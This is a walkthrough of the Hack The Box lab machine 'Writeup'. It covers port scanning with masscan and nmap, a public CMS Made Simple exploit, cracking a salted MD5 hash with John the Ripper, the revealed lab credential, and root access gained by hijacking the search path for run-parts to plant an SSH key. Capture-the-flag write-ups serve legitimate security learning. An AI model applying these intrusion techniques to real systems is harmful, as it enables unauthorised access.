This post documents the complete walkthrough of Writeup, a retired vulnerable VM created by jkr, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post


Writeup is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

# masscan -e tun0 -p1-65535,U:1-65535 --rate=1000

Starting masscan 1.0.4 ( at 2019-06-11 06:06:24 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on
Discovered open port 22/tcp on

Nothing unusual with the ports. Let’s do one better with nmap scanning the discovered ports to establish the services.

# nmap -n -v -Pn -p22,80 -A --reason -oN nmap.txt
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.25 ((Debian))
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET POST
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.

Hmm. There’s an entry in robots.txt, calling me to check it out. Here’s how it looks like.

Pretty HTML :laughing:

CMS Made Simple

If you check out the HTML source of /writeup, you’ll see that CMS Made Simple was used.

And because this box is pretty new, you have to look for a relatively new exploit as well. For that, look no further than EDB-ID 46635. Running the exploit is pretty self-explanatory.

Once that’s done, we can go ahead and recover the password from the salted MD5 hash with John the Ripper.

# cat hash.txt

According to the exploit, the hash format is md5($s.$p).

# john --list=subformats
UserFormat = dynamic_1017  type = dynamic_1017: md5($s.$p) (long salt)

It was super quick!

Low-Privilege Shell

Perhaps the credential (jkr:raykayjay9) is meant for SSH? Well, there’s only one way to find out.

Baam. Straight to user.txt.

Privilege Escalation

During enumeration of jkr’s account, I noticed that it’s in the staff group, which is pretty unusual. Check out what the staff group can do.

This means that jkr as a member of staff, can write stuff to /usr/local/bin and /usr/local/sbin! Now, I just need something to execute stuff from these two directories. Enter pspy.

See what happens when I log in.

Classic search path hijacking. Armed with this knowledge, we can create the following “fake” run-parts.

It creates a .ssh directory in /root if it doesn’t exist and then echo a SSH public key I control to authorized_keys. Lastly, we simply pass all the original options and arguments to the real run-parts.

Let’s test this concept.

Awesome. Getting root.txt is trivial.